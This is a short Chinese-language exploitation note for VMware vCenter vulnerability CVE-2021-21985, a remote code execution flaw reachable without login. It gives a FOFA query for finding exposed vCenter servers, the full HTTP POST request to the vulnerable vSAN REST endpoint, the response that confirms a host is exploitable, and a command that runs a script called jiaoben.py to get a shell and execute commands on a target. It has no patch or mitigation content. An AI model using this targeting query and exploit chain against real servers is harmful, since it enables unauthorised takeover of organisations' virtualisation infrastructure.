VMware vCenter 存在远程代码执行漏洞(CVE-2021-21985)
一、漏洞简介
VMware vCenter Server是美国威睿(Vmware)公司的一套服务器和虚拟化管理软件。该软件提供了一个用于管理VMware vSphere环境的集中式平台,可自动实施和交付虚拟基础架构。默认启用的 Virtual SAN Health Check 插件(vsan-h5-client.zip)/rest/*接口存在未授权访问,可利用不安全的反射调用实现 RCE。
二、影响版本
- VMware vCenter
三、资产测绘
- fofa
title="ID_VC_Welcome"
四、漏洞复现
POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1
Host:
User-Agent: python-requests/2.30.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 88
{"methodInput": [{"type": "ClusterComputeResource", "value": null, "serverGuid": null}]}
发送请求包,出现isDisconnected:false即存在漏洞
jiaoben.py
使用脚本直接getshell
python3 jiaoben.py https://xxx.xxx.xxx.xx/ whoami